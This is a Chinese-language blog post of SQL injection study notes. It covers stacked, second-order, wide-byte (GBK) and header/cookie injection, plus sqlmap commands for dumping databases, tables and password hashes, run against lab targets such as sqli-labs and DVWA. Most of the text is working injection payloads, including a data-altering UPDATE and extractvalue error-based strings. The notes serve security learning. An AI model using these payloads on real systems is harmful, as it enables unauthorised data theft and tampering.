<h2 id="26-堆叠注入"><a href="#26-堆叠注入" class="headerlink" title="26 堆叠注入"></a>26 堆叠注入</h2><p>利用;隔开</p>
<p>和union注入的区别</p>
<p>and 1=1—+成立 and 1=2— +不成立来判断是否可以注入</p>
<p>order by 判断字段数 ==？==</p>
<p>?id=-888’ union select 1,2,3==?把888注释掉==</p>
<p>?=id=-888‘ union select 1,2,3;select sleep(5)—+</p>
<p>?=id=-888‘ union select ‘~‘,database(),’~’—+</p>
<p>?=id=-888‘ union select ‘~‘,table_name,’~’ from information_schema.tables where table_schema=’test’—+</p>
<p>?=id=-888‘ union select ‘~‘,column_name,’~’ from information_schema.columns where table_schema=’test’ and table_name=’floor_test’—+</p>
<p>更改数据</p>
<p>?id=-888’;update floortest set name=’change’ where id=6 —+</p>
<p>还可以进行delect/插入操作</p>
<p>原理：php使用PDO编译，存在堆叠注入，可以执行多条sql语句</p>
<p>union注入只能进行查询操作</p>
<h2 id="27-二次注入"><a href="#27-二次注入" class="headerlink" title="27 二次注入"></a>27 二次注入</h2><p>攻击者在注册的地方构造恶意的sql语句，提交到服务器储存到数据库中</p>
<p>注册 username:admin’# password:123456</p>
<p>修改admin’#的密码</p>
<p>查看数据库发现admin’#密码未被改变 而admin密码改变</p>
<p>原理：</p>
<p>修改密码源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$sql=<span class="string">"UPDATE users SET PASSWORD='$pass' where username='admin'#' and password='$curr_pass'"</span>;</span><br></pre></td></tr></table></figure>
<p>实际修改了admin的密码 并且’ and password=’$curr_pass’被注释了</p>
<p>这样就可以实现随意指定用户名而不用知道他的密码 修改其密码</p>
<h2 id="28-宽字节注入"><a href="#28-宽字节注入" class="headerlink" title="28 宽字节注入"></a>28 宽字节注入</h2><p>一.什么是宽字节注入</p>
<p>宽字节注入是因为gbk编码方式需要两个ascii码组合来解码，所以形象的叫做宽字节</p>
<p>二.宽字节注入的条件</p>
<p>1)数据库查询设置为GBK编码</p>
<p>2)addslashes(),mysql_real_escape_string(),mysql_escape_string()这类的过滤函数(会对输入的字符串产生过滤操作)</p>
<p>两条同时满足</p>
<p>三、原理</p>
<p>假设我们传递一个参数id=1’ 会被认为单引号是不合法的，会被过滤函数添加转义”\”给过滤掉。要想程序接受我们传递的参数中包含单引号，就需要把转义字符给干掉</p>
<p>当http协议传输时，要经过url编码的（空格变为%20，单引号变为 %27），如果这个编码完成后，传递到服务器，==有奇数个数==（有奇数个url编码），它会把前边偶数个数的字符当gbk编码去解码，那么剩下的就当普通的url去解码，所以我们就可以在单引号之前添加一个%81这样的编码，这样到最后解码的时候，这个%81就会和”\”对应的编码相结合按照gvk的要求去解码，最后就只剩下个单引号。</p>
<p>四、实例</p>
<p>%5c表示反斜杠</p>
<p>?id=1’</p>
<p>提交过后 1%5c%27</p>
<p>?id=1%81’</p>
<p>提交过后 1%81%5c%27</p>
<p>由于gbk编码特性,%81%5c组合，%27解码成单引号</p>
<p>发生报错，说明成功干扰，%81%5c解码成中文</p>
<p>按照正常流程进行注入</p>
<p>进行union,order by下一步操作</p>
<p>?id=1%81’ union select 1,2,3—+</p>
<p>页面不显示，如果想将联合查询的内容显示到页面上</p>
<p>?id=-1%81’ union select 1,2,3—++</p>
<p>前面的-1查询不到，就会把后面的内容显示到页面上</p>
<p>在2,3位置查询user() database()</p>
<p>进行后续系列操作</p>
<p>注意：table_schema=’security’又被转义，这时不能通过宽字节注入，因为对应的数据库名前对加上汉字，可以转换字符串为对应的十六进制0x+就可以解决问题</p>
<p>五、其他</p>
<p>若想将网页修改为gbk编码方式：更多-&gt;文字编码-&gt;简体中文</p>
<p>gbk编码是由两个ascii字符来解码的，gbk编码汉字是从%81开始的</p>
<p>从81开始都可以到FE结束，都可以达到编码效果</p>
<h2 id="29-UserAgent、Referer、Cookie注入"><a href="#29-UserAgent、Referer、Cookie注入" class="headerlink" title="29 UserAgent、Referer、Cookie注入"></a>29 UserAgent、Referer、Cookie注入</h2><p>注入点不仅存在与get/post传参，请求包头部字段user-agent/referer/cookie/x-forwarded-for(头部字段名)都有可能发生sql注入</p>
<h3 id="user-agent注入"><a href="#user-agent注入" class="headerlink" title="user-agent注入"></a>user-agent注入</h3><p>使用burp抓包分析请求报文</p>
<p>将抓到的post请求包发送到repeater模块</p>
<p>通过更改User-agent的值查看页面回显</p>
<p>user-agent:aaa’ 使用闭合单引号发现出现报错，干扰了正常的sql语句</p>
<p>构造报错注入相关语句</p>
<p>使用—+和#都报错说明注释可能无法使用，改为</p>
<p>user-agent:aaaa’ and ‘1’=’1</p>
<p>使用常见的三种报错函数进行报错注入</p>
<p>user-agent: aaa’ and extractvalue(1,concat(0x7e,(select user()),0x7e)) and ‘1’=’1</p>
<p>后续进行sql注入</p>
<p><strong>select @@basedir为安装路径查询</strong></p>
<h3 id="cookie注入"><a href="#cookie注入" class="headerlink" title="cookie注入"></a>cookie注入</h3><p>Cookie:uname=admin</p>
<p>Cookie:uname=admin’ 产生报错</p>
<p>Cookie:uname=admin’ and ‘1’=’1</p>
<p>Cookie:uname=admin; and extractvalue(1,concat(0x7e,(select @@basedir),0x7e))</p>
<p>注意：取出数据的长度最多三十二位，如果想要完整显示出来，需要使用字符串截取函数分段显示出来</p>
<h2 id="30-通过注入漏洞获取账号密码登录后台网站"><a href="#30-通过注入漏洞获取账号密码登录后台网站" class="headerlink" title="30 通过注入漏洞获取账号密码登录后台网站"></a>30 通过注入漏洞获取账号密码登录后台网站</h2><p>?id=1’ 页面发生变化，变为空白</p>
<p>?id=1’—+ 页面保持空白，说明此处id类型不是字符型</p>
<p>?id=1 and 1=1 页面正常显示</p>
<p>这时看?id=1 and 1=2 若也正常显示，说明此处不存在注入点；不正常显示，判断为数字型的sql注入</p>
<p>?id=-1 union select 1,2,3,4</p>
<p>查出字段后 将查询值改为查不到的数值可以看到字段在哪里回显</p>
<h2 id="31-sqlmap简介与使用"><a href="#31-sqlmap简介与使用" class="headerlink" title="31 sqlmap简介与使用"></a>31 sqlmap简介与使用</h2><p>sqlmap是一个自动化的SQL注入工具，其主要功能是扫描，发现并利用给定的URL的SQL注入漏洞，采用四种SQL注入技术：union注入，堆叠注入，报错注入，时间盲注，布尔盲注</p>
<p>sqlmap基于python2.7</p>
<h3 id="sqlmap使用"><a href="#sqlmap使用" class="headerlink" title="sqlmap使用"></a>sqlmap使用</h3><p><strong>判断是否存在注入</strong></p>
<p>①sqlmap -u <a href="http://193.112.113.137/sqlilbs/less-1?id=1" target="_blank" rel="noopener">http://193.112.113.137/sqlilbs/less-1?id=1</a></p>
<p>弹出it looks like the back-end DBMS is “MySQL”.Do you want to skip test payloads specific for other DBMSes?进行交互</p>
<p>(数据库可能是MySQL数据库，是否跳过检测其他数据库)</p>
<p>for the remaining tests,do you want to include all tests for ‘MySQL’ extending provided level(1) and risk(1) values?</p>
<p>(在level(1) and risk(1)情况下，是否使用Mysql所有的payload进行检测，默认即可)</p>
<p>②使用burpsuite抓包</p>
<p>将请求(Request-Raw)复制到kali中</p>
<p>创建文本文件vim sqlcheck.txt</p>
<p>sqlmap -r sqlcheck.txt</p>
<p>效果和①相同</p>
<p>当payload只有Id一个参数时不用加双引号，当有两个参数时，sqlmap -u “<a href="http://193.112.113.137/sqlilabs/less-1?id=1&amp;uid=1" target="_blank" rel="noopener">http://193.112.113.137/sqlilabs/less-1?id=1&amp;uid=1</a>“ 使用＆并添加双引号</p>
<p><strong>查询当前用户下所有数据库</strong></p>
<p>sqlmap -u <a href="http://193.112.113.137/sqlilabs/less-1?id=1" target="_blank" rel="noopener">http://193.112.113.137/sqlilabs/less-1?id=1</a> —dbs</p>
<p><strong>获取某个数据库中的表名</strong></p>
<p>sqlmap -u <a href="http://193.112.113.137/sqlilabs/less-1?id=1" target="_blank" rel="noopener">http://193.112.113.137/sqlilabs/less-1?id=1</a> -D(指定获取哪一个数据库中的表名) security —tables(获取security数据库中所有表名)</p>
<p><strong>获取某张表中的字段名</strong></p>
<p>sqlmap -u <a href="http://193.112.113.137/sqlilabs/less-1?id=1" target="_blank" rel="noopener">http://193.112.113.137/sqlilabs/less-1?id=1</a> -D(指定获数据库来定位)security -T users —columns</p>
<p><strong>获取字段里的数据</strong></p>
<p>sqlmap -u <a href="http://193.112.113.137/sqlilabs/less-1?id=1" target="_blank" rel="noopener">http://193.112.113.137/sqlilabs/less-1?id=1</a> -D(指定获数据库来定位)security -T users -C id,username,password</p>
<p>—dump</p>
<p>需要获取的字段通过逗号连接 id,username,password</p>
<h2 id="32-sqlmap自动化注入实战"><a href="#32-sqlmap自动化注入实战" class="headerlink" title="32 sqlmap自动化注入实战"></a>32 sqlmap自动化注入实战</h2><p>首先判断注入点是否存在</p>
<p>sqlmap -u url</p>
<p>如果不确定注入点是否在get方式，可以把http请求保存到文本，sqlmap -r 在文本中读取http请求进行测试</p>
<p>读取当前所有数据库 —dbs</p>
<p>查看当前的数据库 sqlmap -u url —current -db</p>
<p>获取数据库中所有表</p>
<p>sqlmap -u url -D nonoi_col(数据库名) —tables</p>
<p>获取表里的字段</p>
<p>sqlmap -u url -D nonoi_col(数据库名) -T cat(表名) —columns</p>
<p>获取数据</p>
<p>sqlmap -u url -D nonoi_col -T cat -C cat_name,cid —dump</p>
<p>如果直接使用—dump</p>
<p>sqlmap -u url —dump</p>
<p> 自动把所有数据库中所有表给读取出来</p>
<p>并对相应的哈希值进行暴力破解</p>
<h2 id="33-sqlmap的使用以及load-file-读取目标系统文件"><a href="#33-sqlmap的使用以及load-file-读取目标系统文件" class="headerlink" title="33 sqlmap的使用以及load_file()读取目标系统文件"></a>33 sqlmap的使用以及load_file()读取目标系统文件</h2><h3 id="sqlmap连接需要登录的页面"><a href="#sqlmap连接需要登录的页面" class="headerlink" title="sqlmap连接需要登录的页面"></a>sqlmap连接需要登录的页面</h3><p>ipconfig查询本地ip</p>
<p>sqlmap -u “<a href="http://172.20.10.2/DVWA/vulnerabilities/sqli/?id=1&amp;Submit=Submit#" target="_blank" rel="noopener">http://172.20.10.2/DVWA/vulnerabilities/sqli/?id=1&amp;Submit=Submit#</a>“ —dbs</p>
<p>会显示sqlmap got a 302 redirect to ‘…’ 进行重定向</p>
<p>如果换一个浏览器，访问上述地址会首先判断是否登陆过系统</p>
<p>如果没有登录，就会跳转到登录页面登录</p>
<p>如果使用sqlmap遇到这种需要登录才能访问的页面，直接点击回车是不会测出任何结果</p>
<p>我们需要得到对应Cookie，获取cookie的几种方式</p>
<p>①f12-&gt;console(控制台)-&gt;输入js语句 document.cookie</p>
<p>会把当前用户的cookie信息打印下来</p>
<p>②burp抓包获取cookie</p>
<p>burp获取到的请求报文复制</p>
<p>vim cookie.txt(新建一个txt) 保存请求报文</p>
<p>sqlmap -r cookie.txt —dbs</p>
<p>也可以达到同样的效果</p>
<p>sqlmap -u “<a href="http://172.20.10.2/DVWA/vulnerabilities/sqli/?id=1&amp;Submit=Submit#" target="_blank" rel="noopener">http://172.20.10.2/DVWA/vulnerabilities/sqli/?id=1&amp;Submit=Submit#</a>“ —cookie=””  —dbs</p>
<h3 id="其他参数"><a href="#其他参数" class="headerlink" title="其他参数"></a>其他参数</h3><p>1.查看正在连接的数据库</p>
<p>sqlmap -r cookie.txt —current-db</p>
<p>2.获取数据库用户的密码</p>
<p>sqlmap -r cookie.txt —passwords</p>
<p>列举出用户和密码哈希值 接着破解密码的哈希值</p>
<p>3.获取当前数据库的用户名称</p>
<p>sqlmap -r cookie.txt —current-user</p>
<p>4.判断当前用户是否为管理权限</p>
<p>sqlmap -r cookie.txt —is-dba</p>
<p>如果 DBA:True,说明有管理权限</p>
<p>5.测试等级 —level</p>
<p>分为五个等级</p>
<p>如果平时不加等级，默认的等级为 —level 1</p>
<p>6.whereis sqlmap查看sqlmap所在目录 </p>
<p>-&gt; cd  /usr/share/sqlmap </p>
<p>-&gt; cd xml/</p>
<p>-&gt; ls</p>
<p>-&gt;cd payloads</p>
<p>所有测试的payload都存储在该路径下的xml文件下，如果有自己想加入的测试路径，可以加入进来</p>
<p>如果使用—level 5是级别最高的，使用的payload最多的，会对自动破解Cookie,xff头部注入进行测试</p>
<p>运行速度很慢，最好不用使用最高等级</p>
<p>—level 2时会测试cookie相应注入</p>
<p>—level 3会测试 useragent </p>

            </div>

            
                <div class="post-copyright-info">
                    <div class="article-copyright-info-container">
    <ul>
        <li>本文标题：sql注入学习</li>
        <li>本文作者：y4ny4n</li>
        <li>创建时间：2020-11-30 22:08:45</li>
        <li>
            本文链接：https://y4ny4n.cn/2020/11/30/sql注入学习笔记/
        </li>
        <li>
            版权声明：本博客所有文章除特别声明外，均采用 <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">BY-NC-SA</a> 许可协议。转载请注明出处！
        </li>
    </ul>
</div>

                </div>
            

            
                <ul class="post-tags-box">
                    
                        <li class="tag-item">
                            <a href="/tags/sql%E6%B3%A8%E5%85%A5/">#sql注入</a>&nbsp;
                        </li>
                    
                </ul>
            

            

            
                <div class="article-nav">
                    
                        <div class="article-prev">
                            <a class="prev"
                            rel="prev"
                            href="/2021/01/10/bot/"
                            >
                                <span class="left arrow-icon flex-center">
                                    <i class="fa-solid fa-chevron-left"></i>
                                </span>
                                <span class="title flex-center">
                                    <span class="post-nav-title-item">基于mirai和graia框架的机器人搭建</span>
                                    <span class="post-nav-item">上一篇</span>
                                </span>
                            </a>
                        </div>
                    
                    
                        <div class="article-next">
                            <a class="next"
                            rel="next"
                            href="/2020/11/30/java3/"
                            >
                                <span class="title flex-center">
                                    <span class="post-nav-title-item">java学习(3)</span>
                                    <span class="post-nav-item">下一篇</span>
                                </span>
                                <span class="right arrow-icon flex-center">
                                    <i class="fa-solid fa-chevron-right"></i>
                                </span>
                            </a>
                        </div>
                    
                </div>
            


            
        </div>

        
            <div class="toc-content-container">
                <div class="post-toc-wrap">
    <div class="post-toc">
        <div class="toc-title">此页目录</div>
        <div class="page-title">sql注入学习</div>
        <ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#14-SQL%E6%B3%A8%E5%85%A5%E5%8E%9F%E7%90%86"><span class="nav-text">14 SQL注入原理</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#OWASP-top10"><span class="nav-text">OWASP top10</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BB%80%E4%B9%88%E6%98%AFSQL%E6%B3%A8%E5%85%A5"><span class="nav-text">什么是SQL注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%95%B0%E6%8D%AE%E5%BA%93%E5%9F%BA%E7%A1%80"><span class="nav-text">数据库基础</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#mysql"><span class="nav-text">mysql</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E4%BB%80%E4%B9%88%E6%98%AF%E6%95%B0%E6%8D%AE%E5%BA%93"><span class="nav-text">什么是数据库</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#%E5%85%B3%E7%B3%BB%E5%9E%8B%E6%95%B0%E6%8D%AE%E5%BA%93%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%EF%BC%88RDBMS%EF%BC%89"><span class="nav-text">关系型数据库管理系统（RDBMS）</span></a></li></ol></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%95%B0%E6%8D%AE%E5%BA%93%E5%9F%BA%E7%A1%80-1"><span class="nav-text">数据库基础</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#%E5%B8%B8%E7%94%A8%E6%95%B0%E6%8D%AE%E5%BA%93%E6%9F%A5%E8%AF%A2%E8%AF%AD%E5%8F%A5"><span class="nav-text">常用数据库查询语句</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#%E5%B8%B8%E7%94%A8%E6%95%B0%E6%8D%AE%E5%BA%93%E5%86%85%E7%BD%AE%E5%8F%98%E9%87%8F"><span class="nav-text">常用数据库内置变量</span></a></li></ol></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#15%E3%80%8116-mysql%E6%B3%A8%E5%85%A5%E5%B8%B8%E8%A7%81%E5%87%BD%E6%95%B0"><span class="nav-text">15、16   mysql注入常见函数</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#17-18information-schema%E7%9B%B8%E5%85%B3"><span class="nav-text">17 18information_schema相关</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#information-schema%E5%9C%A8mysql%E6%B3%A8%E5%85%A5%E4%B8%AD%E7%9A%84%E8%BF%90%E7%94%A8"><span class="nav-text">information_schema在mysql注入中的运用</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#19-%E3%80%8120-union%E6%B3%A8%E5%85%A5"><span class="nav-text">19 、20 union注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%9F%BA%E4%BA%8Eunion%E7%9A%84%E6%B3%A8%E5%85%A5"><span class="nav-text">基于union的注入</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#%E8%8E%B7%E5%8F%96%E5%AF%B9%E5%BA%94%E8%A1%A8"><span class="nav-text">获取对应表</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#%E6%9F%A5%E8%AF%A2%E5%88%97"><span class="nav-text">查询列</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#%E8%8E%B7%E5%8F%96%E6%95%B0%E6%8D%AE"><span class="nav-text">获取数据</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%85%B7%E4%BD%93%E6%93%8D%E4%BD%9C"><span class="nav-text">具体操作</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#21-%E3%80%8122-%E5%B8%83%E5%B0%94%E7%9B%B2%E6%B3%A8"><span class="nav-text">21 、22 布尔盲注</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%89%8B%E5%B7%A5%E6%B3%A8%E5%85%A5%E8%BF%87%E7%A8%8B"><span class="nav-text">手工注入过程</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BD%BF%E7%94%A8burpsuite"><span class="nav-text">使用burpsuite</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#23-%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8"><span class="nav-text">23  时间盲注</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%A4%E6%96%ADid%E6%95%B0%E6%8D%AE%E7%B1%BB%E5%9E%8B%E6%88%90%E5%8A%9F%E6%89%A7%E8%A1%8Csql%E8%AF%AD%E5%8F%A5"><span class="nav-text">判断id数据类型成功执行sql语句</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%BF%9B%E8%A1%8C%E7%9B%B2%E6%B3%A8"><span class="nav-text">进行盲注</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#24-floor%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5%E5%8E%9F%E7%90%86"><span class="nav-text">24 floor报错注入原理</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8E%9F%E7%90%86%E5%88%86%E6%9E%90"><span class="nav-text">原理分析</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#25-floor%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5%E5%88%A9%E7%94%A8%E6%BC%94%E7%A4%BA"><span class="nav-text">25 floor报错注入利用演示</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#26-extractvalue-%E5%92%8Cupdatexml-%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5"><span class="nav-text">26 extractvalue()和updatexml()报错注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%8A%A5%E9%94%99%E5%8E%9F%E7%90%86"><span class="nav-text">报错原理</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#26-%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5"><span class="nav-text">26 堆叠注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#27-%E4%BA%8C%E6%AC%A1%E6%B3%A8%E5%85%A5"><span class="nav-text">27 二次注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#28-%E5%AE%BD%E5%AD%97%E8%8A%82%E6%B3%A8%E5%85%A5"><span class="nav-text">28 宽字节注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#29-UserAgent%E3%80%81Referer%E3%80%81Cookie%E6%B3%A8%E5%85%A5"><span class="nav-text">29 UserAgent、Referer、Cookie注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#user-agent%E6%B3%A8%E5%85%A5"><span class="nav-text">user-agent注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#cookie%E6%B3%A8%E5%85%A5"><span class="nav-text">cookie注入</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#30-%E9%80%9A%E8%BF%87%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E8%8E%B7%E5%8F%96%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E7%99%BB%E5%BD%95%E5%90%8E%E5%8F%B0%E7%BD%91%E7%AB%99"><span class="nav-text">30 通过注入漏洞获取账号密码登录后台网站</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#31-sqlmap%E7%AE%80%E4%BB%8B%E4%B8%8E%E4%BD%BF%E7%94%A8"><span class="nav-text">31 sqlmap简介与使用</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#sqlmap%E4%BD%BF%E7%94%A8"><span class="nav-text">sqlmap使用</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#32-sqlmap%E8%87%AA%E5%8A%A8%E5%8C%96%E6%B3%A8%E5%85%A5%E5%AE%9E%E6%88%98"><span class="nav-text">32 sqlmap自动化注入实战</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#33-sqlmap%E7%9A%84%E4%BD%BF%E7%94%A8%E4%BB%A5%E5%8F%8Aload-file-%E8%AF%BB%E5%8F%96%E7%9B%AE%E6%A0%87%E7%B3%BB%E7%BB%9F%E6%96%87%E4%BB%B6"><span class="nav-text">33 sqlmap的使用以及load_file()读取目标系统文件</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#sqlmap%E8%BF%9E%E6%8E%A5%E9%9C%80%E8%A6%81%E7%99%BB%E5%BD%95%E7%9A%84%E9%A1%B5%E9%9D%A2"><span class="nav-text">sqlmap连接需要登录的页面</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%85%B6%E4%BB%96%E5%8F%82%E6%95%B0"><span class="nav-text">其他参数</span></a></li></ol></li></ol>

    </div>
</div>
            </div>
        
    </div>
</div>


                

            </div>



        </div>

        <div class="page-main-content-bottom">
            <footer class="footer">
    <div class="info-container">
        <div class="copyright-info">
            &copy;
            
              <span>2022</span>
              -
            
            2023&nbsp;&nbsp;<i class="fa-regular fa-computer-classic"></i>&nbsp;&nbsp;<a href="/">y4ny4n</a>
        </div>
        
            <script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <div class="website-count info-item">
                
                    <span id="busuanzi_container_site_uv" class="busuanzi_container_site_uv">
                        访问人数&nbsp;<span id="busuanzi_value_site_uv" class="busuanzi_value_site_uv"></span>
                    </span>
                
                
                    <span id="busuanzi_container_site_pv" class="busuanzi_container_site_pv">
                        总访问量&nbsp;<span id="busuanzi_value_site_pv" class="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="theme-info info-item">
            <span class="powered-by-container">由 <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" href="https://hexo.io">Hexo</a> 驱动</span>
                <br> 
            <span class="theme-version-container">主题&nbsp;<a class="theme-version" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v1.2.0</a>
        </div>
        
        
        
            <div id="start_time_div" style="display:none">
                2022/8/17 11:45:14
            </div>
            <div>
                博客已运行 <span class="odometer" id="runtime_days" ></span> 天 <span class="odometer" id="runtime_hours"></span> 小时 <span class="odometer" id="runtime_minutes"></span> 分钟 <span class="odometer" id="runtime_seconds"></span> 秒
            </div>
        
        
        
            <script async data-pjax>
                try {
                    function odometer_init() {
                    const elements = document.querySelectorAll('.odometer');
                    elements.forEach(el => {
                        new Odometer({
                            el,
                            format: '( ddd).dd',
                            duration: 200
                        });
                    });
                    }
                    odometer_init();
                } catch (error) {}
            </script>
        
        
        
    </div>  
</footer>
        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="tools-list">
        <!-- TOC aside toggle -->
        
            <li class="right-bottom-tools page-aside-toggle">
                <i class="fa-regular fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
    </ul>
</div>

        </div>
    

    <div class="right-bottom-side-tools">
        <div class="side-tools-container">
    <ul class="unfolded-tools-list">
        <li class="right-bottom-tools tool-font-adjust-plus flex-center">
            <i class="fa-regular fa-magnifying-glass-plus"></i>
        </li>

        <li class="right-bottom-tools tool-font-adjust-minus flex-center">
            <i class="fa-regular fa-magnifying-glass-minus"></i>
        </li>

        <li class="right-bottom-tools tool-expand-width flex-center">
            <i class="fa-regular fa-expand"></i>
        </li>

        <li class="right-bottom-tools tool-dark-light-toggle flex-center">
            <i class="fa-regular fa-moon"></i>
        </li>

        <!-- rss -->
        

        
            <li class="right-bottom-tools tool-scroll-to-top flex-center">
                <i class="fa-regular fa-arrow-up"></i>
            </li>
        

        <li class="right-bottom-tools tool-scroll-to-bottom flex-center">
            <i class="fa-regular fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="folded-tools-list">
        <li class="right-bottom-tools tool-toggle-show flex-center">
            <i class="fa-regular fa-cog fa-spin"></i>
        </li>
        
    </ul>
</div>

    </div>

    <div class="image-viewer-container">
    <img src="">
</div>


    


</main>




<script src="/js/utils.js"></script>

<script src="/js/main.js"></script>

<script src="/js/layouts/menu-shrink.js"></script>

<script src="/js/tools/go-top-bottom.js"></script>

<script src="/js/tools/dark-light-toggle.js"></script>





    
<script src="/js/tools/code-block.js"></script>




    
<script src="/js/layouts/lazyload.js"></script>




    
<script src="/js/tools/runtime.js"></script>

    
<script src="/js/layouts/odometer.min.js"></script>

    
<link rel="stylesheet" href="/assets/odometer-theme-minimal.css">





<div class="post-scripts pjax">
    
        
<script src="/js/tools/toc-toggle.js"></script>

<script src="/js/libs/anime.min.js"></script>

<script src="/js/layouts/toc.js"></script>

<script src="/js/plugins/tabs.js"></script>

    
    
</div>


    
<script src="/js/libs/pjax.min.js"></script>

<script>
    window.addEventListener('DOMContentLoaded', () => {
        window.pjax = new Pjax({
            selectors: [
                'head title',
                '.page-container',
                '.pjax'
            ],
            history: true,
            debug: false,
            cacheBust: false,
            timeout: 0,
            analytics: false,
            currentUrlFullReload: false,
            scrollRestoration: false,
            // scrollTo: true,
        });

        document.addEventListener('pjax:send', () => {
            REDEFINE.utils.pjaxProgressBarStart();
        });

        document.addEventListener('pjax:complete', () => {
            REDEFINE.utils.pjaxProgressBarEnd();
            window.pjax.executeScripts(document.querySelectorAll('script[data-pjax], .pjax script'));
            REDEFINE.refresh();
        });
    });
</script>




<script type="text/x-mathjax-config">
    MathJax.Hub.Config({
        tex2jax: {
            inlineMath: [ ["$","$"], ["\\(","\\)"] ],
            skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code'],
            processEscapes: true
        }
    });
    MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax();
        for (var i = 0; i < all.length; ++i)
            all[i].SourceElement().parentNode.className += ' has-jax';
    });
</script>
<script src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
</body>
</html>
